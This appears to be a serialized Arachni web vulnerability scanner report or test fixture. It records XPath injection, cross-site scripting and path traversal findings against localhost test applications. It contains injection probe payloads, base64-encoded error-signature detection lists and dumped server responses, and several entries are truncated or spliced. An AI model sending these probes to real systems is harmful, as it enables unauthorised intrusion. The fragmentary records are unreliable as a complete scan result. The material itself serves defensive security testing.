"WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- NDUz !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxNjo1MCBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: XPath Injection description: XPath queries can be injected into the web application. tags: - xpath - database - error - injection - regexp cwe: '91' cwe_url: http://cwe.mitre.org/data/definitions/91.html severity: High remedy_guidance: ! 
"User inputs must be validated and filtered\n before being included in database queries." mod_name: XPath Injection variations: [] internal_modname: XPathInjection internal_modname: XPathInjection - !ruby/object:Arachni::Issue verification: false references: OWASP: http://www.owasp.org/index.php/XPATH_Injection var: User-Agent url: http://localhost:13111/general/header/append elem: header method: GET name: XPath Injection description: XPath queries can be injected into the web application. tags: - xpath - database - error - injection - regexp cwe: '91' cwe_url: http://cwe.mitre.org/data/definitions/91.html severity: High remedy_guidance: ! "User inputs must be validated and filtered\n before being included in database queries." mod_name: XPath Injection variations: - !ruby/object:Arachni::Issue verification: false references: OWASP: http://www.owasp.org/index.php/XPATH_Injection opts: :redundant: false :async: true :regexp: !binary |- QSBjbG9zaW5nIGJyYWNrZXQgZXhwZWN0ZWQgaW4= :match: !binary |- QSBjbG9zaW5nIGJyYWNrZXQgZXhwZWN0ZWQgaW4= :substring: - !binary |- eG1sWFBhdGhFdmFsOiBldmFsdWF0aW9uIGZhaWxlZA== - !binary |- U2ltcGxlWE1MRWxlbWVudDo6eHBhdGgoKQ== - !binary |- WFBhdGhFeGNlcHRpb24= - !binary |- TVMuSW50ZXJuYWwuWG1sLg== - !binary |- VW5rbm93biBlcnJvciBpbiBYUGF0aA== - !binary |- b3JnLmFwYWNoZS54cGF0aC5YUGF0aA== - !binary |- QSBjbG9zaW5nIGJyYWNrZXQgZXhwZWN0ZWQgaW4= - !binary |- QW4gb3BlcmFuZCBpbiBVbmlvbiBFeHByZXNzaW9uIGRvZXMgbm90IHByb2R1 Y2UgYSBub2RlLXNldA== - !binary |- Q2Fubm90IGNvbnZlcnQgZXhwcmVzc2lvbiB0byBhIG51bWJlcg== - !binary |- RG9jdW1lbnQgQXhpcyBkb2VzIG5vdCBhbGxvdyBhbnkgY29udGV4dCBMb2Nh dGlvbiBTdGVwcw== - !binary |- RW1wdHkgUGF0aCBFeHByZXNzaW9u - !binary |- RW1wdHkgUmVsYXRpdmUgTG9jYXRpb24gUGF0aA== - !binary |- RW1wdHkgVW5pb24gRXhwcmVzc2lvbg== - !binary |- RXhwZWN0ZWQgJyknIGlu - !binary |- RXhwZWN0ZWQgbm9kZSB0ZXN0IG9yIG5hbWUgc3BlY2lmaWNhdGlvbiBhZnRl ciBheGlzIG9wZXJhdG9y - !binary |- SW5jb21wYXRpYmxlIFhQYXRoIGtleQ== - !binary |- 
SW5jb3JyZWN0IFZhcmlhYmxlIEJpbmRpbmc= - !binary |- bGlieG1sMiBsaWJyYXJ5IGZ1bmN0aW9uIGZhaWxlZA== - !binary |- eG1sc2VjIGxpYnJhcnkgZnVuY3Rpb24= - !binary |- ZXJyb3IgJzgwMDA0MDA1Jw== - !binary |- QSBkb2N1bWVudCBtdXN0IGNvbnRhaW4gZXhhY3RseSBvbmUgcm9vdCBlbGVt ZW50Lg== - !binary |- RXhwcmVzc2lvbiBtdXN0IGV2YWx1YXRlIHRvIGEgbm9kZS1zZXQu - !binary |- RXhwZWN0ZWQgdG9rZW4gJ10n - !binary |- PHA+bXN4bWw0LmRsbDwvZm9udD4= - !binary |- PHA+bXN4bWwzLmRsbDwvZm9udD4= :ignore: :elements: - link - form - cookie - header - body :train: :format: - 2 :injected_orig: ! ']]]]]]]]]' :altered: User-Agent :element: header :params: :follow_location: true :headers: User-Agent: arachni_user]]]]]]]]] :injected: arachni_user]]]]]]]]] :combo: User-Agent: arachni_user]]]]]]]]] :action: http://localhost:13111/general/header/append :verification: false :id: !binary |- QSBjbG9zaW5nIGJyYWNrZXQgZXhwZWN0ZWQgaW4= var: User-Agent url: http://localhost:13111/general/header/append injected: arachni_user]]]]]]]]] id: A closing bracket expected in regexp: A closing bracket expected in regexp_match: A closing bracket expected in elem: header remarks: {} method: GET response: ! 'A closing bracket expected in An operand in Union Expression does not produce a node-set Cannot convert expression to a number Document Axis does not allow any context Location Steps Empty Path Expression Empty Relative Location Path Empty Union Expression Expected '')'' in Expected node test or name specification after axis operator Incompatible XPath key Incorrect Variable Binding A document must contain exactly one root element. 
Expected token '']'' ' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: arachni_user]]]]]]]]] Cookie: cookie2=cookie+value response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- NDUz !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxNjo1MiBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: XPath Injection description: XPath queries can be injected into the web application. tags: - xpath - database - error - injection - regexp cwe: '91' cwe_url: http://cwe.mitre.org/data/definitions/91.html severity: High remedy_guidance: ! "User inputs must be validated and filtered\n before being included in database queries." mod_name: XPath Injection variations: [] internal_modname: XPathInjection internal_modname: XPathInjection - !ruby/object:Arachni::Issue verification: false references: OWASP: http://www.owasp.org/index.php/XPATH_Injection var: input url: http://localhost:13111/php/form/append elem: form method: GET name: XPath Injection description: XPath queries can be injected into the web application. tags: - xpath - database - error - injection - regexp cwe: '91' cwe_url: http://cwe.mitre.org/data/definitions/91.html severity: High remedy_guidance: ! "User inputs must be validated and filtered\n before being included in database queries." 
mod_name: XPath Injection variations: - !ruby/object:Arachni::Issue verification: false references: OWASP: http://www.owasp.org/index.php/XPATH_Injection opts: :redundant: false :async: true :regexp: !binary |- eG1sWFBhdGhFdmFsOiBldmFsdWF0aW9uIGZhaWxlZA== :match: !binary |- eG1sWFBhdGhFdmFsOiBldmFsdWF0aW9uIGZhaWxlZA== :substring: - !binary |- eG1sWFBhdGhFdmFsOiBldmFsdWF0aW9uIGZhaWxlZA== - !binary |- U2ltcGxlWE1MRWxlbWVudDo6eHBhdGgoKQ== - !binary |- WFBhdGhFeGNlcHRpb24= - !binary |- TVMuSW50ZXJuYWwuWG1sLg== - !binary |- VW5rbm93biBlcnJvciBpbiBYUGF0aA== - !binary |- b3JnLmFwYWNoZS54cGF0aC5YUGF0aA== - !binary |- QSBjbG9zaW5nIGJyYWNrZXQgZXhwZWN0ZWQgaW4= - !binary |- QW4gb3BlcmFuZCBpbiBVbmlvbiBFeHByZXNzaW9uIGRvZXMgbm90IHByb2R1 Y2UgYSBub2RlLXNldA== - !binary |- Q2Fubm90IGNvbnZlcnQgZXhwcmVzc2lvbiB0byBhIG51bWJlcg== - !binary |- RG9jdW1lbnQgQXhpcyBkb2VzIG5vdCBhbGxvdyBhbnkgY29udGV4dCBMb2Nh dGlvbiBTdGVwcw== - !binary |- RW1wdHkgUGF0aCBFeHByZXNzaW9u - !binary |- RW1wdHkgUmVsYXRpdmUgTG9jYXRpb24gUGF0aA== - !binary |- RW1wdHkgVW5pb24gRXhwcmVzc2lvbg== - !binary |- RXhwZWN0ZWQgJyknIGlu - !binary |- RXhwZWN0ZWQgbm9kZSB0ZXN0IG9yIG5hbWUgc3BlY2lmaWNhdGlvbiBhZnRl ciBheGlzIG9wZXJhdG9y - !binary |- SW5jb21wYXRpYmxlIFhQYXRoIGtleQ== - !binary |- SW5jb3JyZWN0IFZhcmlhYmxlIEJpbmRpbmc= - !binary |- bGlieG1sMiBsaWJyYXJ5IGZ1bmN0aW9uIGZhaWxlZA== - !binary |- eG1sc2VjIGxpYnJhcnkgZnVuY3Rpb24= - !binary |- ZXJyb3IgJzgwMDA0MDA1Jw== - !binary |- QSBkb2N1bWVudCBtdXN0IGNvbnRhaW4gZXhhY3RseSBvbmUgcm9vdCBlbGVt ZW50Lg== - !binary |- RXhwcmVzc2lvbiBtdXN0IGV2YWx1YXRlIHRvIGEgbm9kZS1zZXQu - !binary |- RXhwZWN0ZWQgdG9rZW4gJ10n - !binary |- PHA+bXN4bWw0LmRsbDwvZm9udD4= - !binary |- PHA+bXN4bWwzLmRsbDwvZm9udD4= :ignore: :elements: - link - form - cookie - header - body :train: :format: - 2 :injected_orig: ! 
']]]]]]]]]' :altered: !binary |- aW5wdXQ= :element: form :params: !binary "aW5wdXQ=": default]]]]]]]]] :follow_location: true :injected: default]]]]]]]]] :combo: !binary "aW5wdXQ=": default]]]]]]]]] :action: http://localhost:13111/php/form/append :verification: false :id: !binary |- eG1sWFBhdGhFdmFsOiBldmFsdWF0aW9uIGZhaWxlZA== var: input url: http://localhost:13111/php/form/append injected: default]]]]]]]]] id: ! 'xmlXPathEval: evaluation failed' regexp: ! 'xmlXPathEval: evaluation failed' regexp_match: ! 'xmlXPathEval: evaluation failed' elem: form remarks: :stuff: - Blah - Blah2 method: GET response: ! 'xmlXPathEval: evaluation failed SimpleXMLElement::xpath() ' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie2=cookie+value response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- NTg= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxNjo1NCBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: XPath Injection description: XPath queries can be injected into the web application. tags: - xpath - database - error - injection - regexp cwe: '91' cwe_url: http://cwe.mitre.org/data/definitions/91.html severity: High remedy_guidance: ! "User inputs must be validated and filtered\n before being included in database queries." 
mod_name: XPath Injection variations: [] internal_modname: XPathInjection internal_modname: XPathInjection - !ruby/object:Arachni::Issue verification: true references: OWASP: http://www.owasp.org/index.php/XPATH_Injection var: input url: http://localhost:13111/php/link/append?input=default elem: link method: GET name: XPath Injection description: XPath queries can be injected into the web application. tags: - xpath - database - error - injection - regexp cwe: '91' cwe_url: http://cwe.mitre.org/data/definitions/91.html severity: High remedy_guidance: ! "User inputs must be validated and filtered\n before being included in database queries." mod_name: XPath Injection variations: - !ruby/object:Arachni::Issue verification: true references: OWASP: http://www.owasp.org/index.php/XPATH_Injection opts: :redundant: false :async: true :regexp: !binary |- eG1sWFBhdGhFdmFsOiBldmFsdWF0aW9uIGZhaWxlZA== :match: !binary |- eG1sWFBhdGhFdmFsOiBldmFsdWF0aW9uIGZhaWxlZA== :substring: - !binary |- eG1sWFBhdGhFdmFsOiBldmFsdWF0aW9uIGZhaWxlZA== - !binary |- U2ltcGxlWE1MRWxlbWVudDo6eHBhdGgoKQ== - !binary |- WFBhdGhFeGNlcHRpb24= - !binary |- TVMuSW50ZXJuYWwuWG1sLg== - !binary |- VW5rbm93biBlcnJvciBpbiBYUGF0aA== - !binary |- b3JnLmFwYWNoZS54cGF0aC5YUGF0aA== - !binary |- QSBjbG9zaW5nIGJyYWNrZXQgZXhwZWN0ZWQgaW4= - !binary |- QW4gb3BlcmFuZCBpbiBVbmlvbiBFeHByZXNzaW9uIGRvZXMgbm90IHByb2R1 Y2UgYSBub2RlLXNldA== - !binary |- Q2Fubm90IGNvbnZlcnQgZXhwcmVzc2lvbiB0byBhIG51bWJlcg== - !binary |- RG9jdW1lbnQgQXhpcyBkb2VzIG5vdCBhbGxvdyBhbnkgY29udGV4dCBMb2Nh dGlvbiBTdGVwcw== - !binary |- RW1wdHkgUGF0aCBFeHByZXNzaW9u - !binary |- RW1wdHkgUmVsYXRpdmUgTG9jYXRpb24gUGF0aA== - !binary |- RW1wdHkgVW5pb24gRXhwcmVzc2lvbg== - !binary |- RXhwZWN0ZWQgJyknIGlu - !binary |- RXhwZWN0ZWQgbm9kZSB0ZXN0IG9yIG5hbWUgc3BlY2lmaWNhdGlvbiBhZnRl ciBheGlzIG9wZXJhdG9y - !binary |- SW5jb21wYXRpYmxlIFhQYXRoIGtleQ== - !binary |- SW5jb3JyZWN0IFZhcmlhYmxlIEJpbmRpbmc= - !binary |- bGlieG1sMiBsaWJyYXJ5IGZ1bmN0aW9uIGZhaWxlZA== - !binary |- 
eG1sc2VjIGxpYnJhcnkgZnVuY3Rpb24= - !binary |- ZXJyb3IgJzgwMDA0MDA1Jw== - !binary |- QSBkb2N1bWVudCBtdXN0IGNvbnRhaW4gZXhhY3RseSBvbmUgcm9vdCBlbGVt ZW50Lg== - !binary |- RXhwcmVzc2lvbiBtdXN0IGV2YWx1YXRlIHRvIGEgbm9kZS1zZXQu - !binary |- RXhwZWN0ZWQgdG9rZW4gJ10n - !binary |- PHA+bXN4bWw0LmRsbDwvZm9udD4= - !binary |- PHA+bXN4bWwzLmRsbDwvZm9udD4= :ignore: :elements: - link - form - cookie - header - body :train: :format: - 2 :injected_orig: ' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie=cookie+value;cookie2=cookie+value response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MTE1 !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxODo0NiBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Cross-Site Scripting (XSS) description: ! "Client-side code (like JavaScript) can\n be injected into the web application which is then returned to the user's browser.\n This can lead to a compromise of the client's system or serve as a pivoting point for other attacks." tags: - xss - regexp - injection - script cwe: '79' cwe_url: http://cwe.mitre.org/data/definitions/79.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being returned as part of the HTML code of a page." 
mod_name: XSS variations: [] internal_modname: XSS internal_modname: XSS - !ruby/object:Arachni::Issue verification: false references: ha.ckers: http://ha.ckers.org/xss.html Secunia: http://secunia.com/advisories/9716/ var: input url: http://localhost:8029/link/straight?input=default elem: link method: GET name: Cross-Site Scripting (XSS) description: ! "Client-side code (like JavaScript) can\n be injected into the web application which is then returned to the user's browser.\n This can lead to a compromise of the client's system or serve as a pivoting point for other attacks." tags: - xss - regexp - injection - script cwe: '79' cwe_url: http://cwe.mitre.org/data/definitions/79.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being returned as part of the HTML code of a page." mod_name: XSS variations: - !ruby/object:Arachni::Issue verification: false references: ha.ckers: http://ha.ckers.org/xss.html Secunia: http://secunia.com/advisories/9716/ opts: :redundant: false :async: true :elements: - link - form - cookie - header - body :train: :format: - 3 :flip_param: true :injected_orig: :altered: !binary |- aW5wdXQ= :element: link :params: !binary "aW5wdXQ=": :follow_location: true :injected: :combo: !binary "aW5wdXQ=": :action: http://localhost:8029/link/straight?input=default :match: :regexp: '' var: input url: http://localhost:8029/link/straight?input=default injected: id: regexp: '' regexp_match: elem: link remarks: {} method: GET response: headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie=cookie+value;cookie2=cookie+value response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary 
"Q29udGVudC1MZW5ndGg=": !binary |- ODg= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxODo0OSBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Cross-Site Scripting (XSS) description: ! "Client-side code (like JavaScript) can\n be injected into the web application which is then returned to the user's browser.\n This can lead to a compromise of the client's system or serve as a pivoting point for other attacks." tags: - xss - regexp - injection - script cwe: '79' cwe_url: http://cwe.mitre.org/data/definitions/79.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being returned as part of the HTML code of a page." mod_name: XSS variations: [] internal_modname: XSS internal_modname: XSS - !ruby/object:Arachni::Issue verification: false references: ha.ckers: http://ha.ckers.org/xss.html Secunia: http://secunia.com/advisories/9716/ var: input url: http://localhost:8029/link/in_textfield?input=default elem: link method: GET name: Cross-Site Scripting (XSS) description: ! "Client-side code (like JavaScript) can\n be injected into the web application which is then returned to the user's browser.\n This can lead to a compromise of the client's system or serve as a pivoting point for other attacks." tags: - xss - regexp - injection - script cwe: '79' cwe_url: http://cwe.mitre.org/data/definitions/79.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being returned as part of the HTML code of a page." mod_name: XSS variations: - !ruby/object:Arachni::Issue verification: false references: ha.ckers: http://ha.ckers.org/xss.html Secunia: http://secunia.com/advisories/9716/ opts: :redundant: false :async: true :elements: - link - form - cookie - header - body :train: :format: - 3 :flip_param: true :injected_orig: ! 
'''-;' :altered: !binary |- aW5wdXQ= :element: link :params: !binary "aW5wdXQ=": ! '''-;' :follow_location: true :injected: ! '''-;' :combo: !binary "aW5wdXQ=": ! '''-;' :action: http://localhost:8029/link/in_textfield?input=default :match: ! '''-;' :regexp: '' var: input url: http://localhost:8029/link/in_textfield?input=default injected: ! '''-;' id: regexp: '' regexp_match: ! '''-;' elem: link remarks: {} method: GET response: ! ' ' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie=cookie+value;cookie2=cookie+value response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MTE3 !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxODo0OSBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Cross-Site Scripting (XSS) description: ! "Client-side code (like JavaScript) can\n be injected into the web application which is then returned to the user's browser.\n This can lead to a compromise of the client's system or serve as a pivoting point for other attacks." tags: - xss - regexp - injection - script cwe: '79' cwe_url: http://cwe.mitre.org/data/definitions/79.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being returned as part of the HTML code of a page." 
mod_name: XSS variations: [] internal_modname: XSS internal_modname: XSS - !ruby/object:Arachni::Issue verification: false references: ha.ckers: http://ha.ckers.org/xss.html Secunia: http://secunia.com/advisories/9716/ var: input url: http://localhost:8029/link/in_comment?input=default elem: link method: GET name: Cross-Site Scripting (XSS) description: ! "Client-side code (like JavaScript) can\n be injected into the web application which is then returned to the user's browser.\n This can lead to a compromise of the client's system or serve as a pivoting point for other attacks." tags: - xss - regexp - injection - script cwe: '79' cwe_url: http://cwe.mitre.org/data/definitions/79.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being returned as part of the HTML code of a page." mod_name: XSS variations: - !ruby/object:Arachni::Issue verification: false references: ha.ckers: http://ha.ckers.org/xss.html Secunia: http://secunia.com/advisories/9716/ opts: :redundant: false :async: true :elements: - link - form - cookie - header - body :train: :format: - 3 :flip_param: true :injected_orig: --> ' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie=cookie+value;cookie2=cookie+value response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MTE1 !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxODo0OSBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Cross-Site Scripting (XSS) description: ! 
"Client-side code (like JavaScript) can\n be injected into the web application which is then returned to the user's browser.\n This can lead to a compromise of the client's system or serve as a pivoting point for other attacks." tags: - xss - regexp - injection - script cwe: '79' cwe_url: http://cwe.mitre.org/data/definitions/79.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being returned as part of the HTML code of a page." mod_name: XSS variations: [] internal_modname: XSS internal_modname: XSS - !ruby/object:Arachni::Issue verification: false references: ha.ckers: http://ha.ckers.org/xss.html Secunia: http://secunia.com/advisories/9716/ var: cookie url: http://localhost:8029/cookie/straight elem: cookie method: GET name: Cross-Site Scripting (XSS) description: ! "Client-side code (like JavaScript) can\n be injected into the web application which is then returned to the user's browser.\n This can lead to a compromise of the client's system or serve as a pivoting point for other attacks." tags: - xss - regexp - injection - script cwe: '79' cwe_url: http://cwe.mitre.org/data/definitions/79.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being returned as part of the HTML code of a page." 
mod_name: XSS variations: - !ruby/object:Arachni::Issue verification: false references: ha.ckers: http://ha.ckers.org/xss.html Secunia: http://secunia.com/advisories/9716/ opts: :redundant: false :async: true :elements: - link - form - cookie - header - body :train: :format: - 3 :flip_param: true :injected_orig: --> ++\n \n \n Weak authentication - basic\n /passive/session/weak-authentication-basic.jsp\n \ \n \n tomcat\n \ role1\n \n \n\n \ \n \n \ BASIC\n Application\n \ \n \n\n \ \n \n \ \n The role that is required to access protected pages\n \ \n tomcat\n \n\n \ \n \n The role that is required to access protected pages\n \n role1\n \n" headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie=default.html response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MTc4Ng== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwMjoyNTozNCBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Path Traversal description: ! "The web application enforces improper limitation\n of a pathname to a restricted directory." tags: - path - traversal - injection - regexp cwe: '22' cwe_url: http://cwe.mitre.org/data/definitions/22.html severity: Medium cvssv2: '4.3' remedy_guidance: ! "User inputs must be validated and filtered\n before being used as a part of a filesystem path." 
remedy_code: '' metasploitable: unix/webapp/arachni_path_traversal mod_name: Path Traversal variations: [] internal_modname: PathTraversal internal_modname: PathTraversal - !ruby/object:Arachni::Issue verification: false references: OWASP: http://www.owasp.org/index.php/Path_Traversal WASC: http://projects.webappsec.org/Path-Traversal var: input url: http://localhost:5784/tomcat/form/with_null elem: form method: POST name: Path Traversal description: ! "The web application enforces improper limitation\n of a pathname to a restricted directory." tags: - path - traversal - injection - regexp cwe: '22' cwe_url: http://cwe.mitre.org/data/definitions/22.html severity: Medium cvssv2: '4.3' remedy_guidance: ! "User inputs must be validated and filtered\n before being used as a part of a filesystem path." remedy_code: '' metasploitable: unix/webapp/arachni_path_traversal mod_name: Path Traversal variations: - !ruby/object:Arachni::Issue verification: false references: OWASP: http://www.owasp.org/index.php/Path_Traversal WASC: http://projects.webappsec.org/Path-Traversal opts: :redundant: false :async: true :regexp: (?i-mx:\n\n VulnerabilityDetectionChallenge\n \ \n index.html\n index.htm\n \ index.jsp\n default.html\n \ default.htm\n default.jsp\n \ \n\n \n \n \n Weak authentication - basic\n /passive/session/weak-authentication-basic.jsp\n \ \n \n tomcat\n \ role1\n \n \n\n \ \n \n \ BASIC\n Application\n \ \n \n\n \ \n \n \ \n The role that is required to access protected pages\n \ \n tomcat\n \n\n \ \n \n The role that is required to access protected pages\n \n role1\n \n" headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie=default.html response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- 
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MTc4Ng== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwMjoyNTozNCBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Path Traversal description: ! "The web application enforces improper limitation\n of a pathname to a restricted directory." tags: - path - traversal - injection - regexp cwe: '22' cwe_url: http://cwe.mitre.org/data/definitions/22.html severity: Medium cvssv2: '4.3' remedy_guidance: ! "User inputs must be validated and filtered\n before being used as a part of a filesystem path." remedy_code: '' metasploitable: unix/webapp/arachni_path_traversal mod_name: Path Traversal variations: [] internal_modname: PathTraversal internal_modname: PathTraversal - !ruby/object:Arachni::Issue verification: false references: OWASP: http://www.owasp.org/index.php/Path_Traversal WASC: http://projects.webappsec.org/Path-Traversal var: input url: http://localhost:5784/tomcat/link/with_null?input=default.html elem: link method: GET name: Path Traversal description: ! "The web application enforces improper limitation\n of a pathname to a restricted directory." tags: - path - traversal - injection - regexp cwe: '22' cwe_url: http://cwe.mitre.org/data/definitions/22.html severity: Medium cvssv2: '4.3' remedy_guidance: ! "User inputs must be validated and filtered\n before being used as a part of a filesystem path." 
remedy_code: '' metasploitable: unix/webapp/arachni_path_traversal mod_name: Path Traversal variations: - !ruby/object:Arachni::Issue verification: false references: OWASP: http://www.owasp.org/index.php/Path_Traversal WASC: http://projects.webappsec.org/Path-Traversal opts: :redundant: false :async: true :regexp: (?i-mx:\n\n VulnerabilityDetectionChallenge\n \ \n index.html\n index.htm\n \ index.jsp\n default.html\n \ default.htm\n default.jsp\n \ \n\n \n \n \n Weak authentication - basic\n /passive/session/weak-authentication-basic.jsp\n \ \n \n tomcat\n \ role1\n \n \n\n \ \n \n \ BASIC\n Application\n \ \n \n\n \ \n \n \ \n The role that is required to access protected pages\n \ \n tomcat\n \n\n \ \n \n The role that is required to access protected pages\n \n role1\n \n" headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie=default.html response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- 